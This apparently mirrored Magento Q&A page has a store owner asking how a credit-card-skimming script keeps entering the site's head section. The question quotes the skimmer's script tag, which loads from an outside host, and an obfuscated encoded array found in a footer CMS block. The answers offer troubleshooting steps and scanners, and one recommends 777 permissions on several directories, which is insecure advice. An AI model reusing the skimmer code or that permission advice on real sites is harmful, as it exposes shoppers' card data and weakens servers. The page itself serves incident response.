TransWikia.com

Magento 2 hacked with script in hacked

Magento Asked by Casey on October 25, 2020

I can’t seem to locate how this script is getting into the head section of my site but it’s stealing credit cards. I’ve grepped the entire codebase and searched the entire database for “seooptimization” and found nothing so it must be added via createElement somewhere? What’s interesting is it’s added in the middle of all my theme js files. Can anyone help me track this down and figure out how to avoid it getting into the head of my site because I’ve chased it around for months now. I’ve removed it from the cms_block in the database, from miscellaneous scripts in the admin and they just keep finding new ways to put it on the site, now I can’t even track it down to get it off. Here’s what it looks like. 

<script src="https://mage-seooptimization.com/events" id="magento-init"></script>

EDIT: So I finally was able to remove this. I found it in the database in one of my footer blocks in the cms_block table. It was disguised as follows:

<script>var meta_tags = ["0604104A124B2257060A0F021D1605114537","4B030D1849001802451A57514D014C164C0604181E040D59124A5D50", "19034A475057444D120B0405190E5E090D090002101F0B4C1A", "11110A04001B1C5E0C0C0E040E36164D1131192B50591E140B", "0245065705191A05080704154D0F1117420B5C12571317070B15", "15200E0F0C1317044D4519020410001145435A1757030016", "3111161808140C04004A4D12041A5749", "570D161E1105435F4A0F0B06135403000D051102101D0C180B151F161E4B01050C591C06000C1E1251504B", "114B110F15370D04170B0814021C58420B0E465A5E1D04050F0F0216", "5D0C0C031551504B014C0204171D5E04121A04181D33", "180C0E0E4917504B07100F001D044B"];</script>

Maybe someone can comment on how that could possibly end up being a script in the head section of the site?

Also, this doesn’t solve how it got there in the first place. Are there any known methods to inject code into the database for Magento 2.2.6 that may need patched? As far as I know I have all available patches applied.

List of enabled modules:

Aitoc_DimensionalShipping | EkoUK_ImageCleaner | Experius_WysiwygDownloads | FishPig_WordPress | FishPig_WordPress_RelatedProducts | MagePal_GuestToCustomer | MagePsycho_Customshipping | Amasty_Base | Amazon_Core | Amazon_Login | Amazon_Payment | FME_Faqs | Bold_OrderComment | Klarna_Core | Klarna_Ordermanagement | Magefan_LoginAsCustomer | Amasty_CronScheduleList | FME_Prodfaqs | Amasty_GiftCard | Klarna_Kp | Ebizmarts_MailChimp | Dotdigitalgroup_Email | Mageplaza_Core | Mageplaza_Smtp | Magiccart_Alothemes | Magiccart_Magicmenu | Magiccart_Magicproduct | Magiccart_Magicslider | Magiccart_Shopbrand | Magiccart_Testimonial | Mirasvit_Core | Mirasvit_Misspell | Mirasvit_Report | Mirasvit_Search | Mirasvit_SearchAutocomplete | Mirasvit_SearchLanding | Mirasvit_SearchMysql | Mirasvit_SearchReport | Mirasvit_SearchSphinx | Mirasvit_SearchUltimate | ShipWorks_Module | Temando_Shipping | VNS_Custom | Vertex_Tax | WeltPixel_Backend | WeltPixel_Maxmind |

magento2

4 Answers

I have encountered a same issue. It was injecting a fake payment section in the checkout page. This time the link was different though. I was able to remove the code using the header block editor in the admin. But I'm kind of sure, it will happen again. Anyways going to update the whole thing. And put a paid firewall service. If anybody finds a solution to this, it'd be very helpful. Thanks.

Answered by Mathew on October 25, 2020

facing the same thing and I have about 70% of the same modules as you!!! Did you ever find out which module led to the vulnerability?

Answered by Jojo on October 25, 2020

  1. check your site in clean browser (not the one you usually use) in case browser extension adds the script to the page
  2. modify root index.php to "echo 123" to check if injecting script relates to Magento.
  3. check on Luma or Base theme to know if need to blame your custom theme
  4. if theme is not the cause disable all 3-rd party modules and check

php bin/magento module:status | grep -v Magento | grep -v List | grep -v None | grep -v -e '^$'| xargs php bin/magento module:disable

  1. go over all .htaccess files in project and look for suspicion file injecting
  2. if theme/3-rd party modules not the cause the issue is probably hidden somewhere in Magento core files

Answered by Denys Belevtsov on October 25, 2020

  1. First of all scan your website with the available tools like

    • SiteCheck
    • MageReport
    • UnmaskParasites
    • Foregenix
    • Github Magento Malware Scanner
    • MageScan
    • VirusTotal

then you will get some idea on malware and security issues for your website.

  1. Please ask your hosting provider for a detail report on Website security.

  2. You can check Magneto file and folder permission as well from your end and male it proper by running the following commands:

find . -type f -exec chmod 644 {} ;             // 644 permission for files
find . -type d -exec chmod 755 {} ;             // 755 permission for directory 
find ./var -type d -exec chmod 777 {} ;         // 777 permission for var folder    
find ./pub/media -type d -exec chmod 777 {} ;
find ./pub/static -type d -exec chmod 777 {} ;
chmod 777 ./app/etc
chmod 644 ./app/etc/*.xml

Hope this will help you and please share an update after this activity so I can guide you next step.

Answered by Jack on October 25, 2020

Add your own answers!

Ask a Question

Get help from others!

Recent Answers

Recent Questions

© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP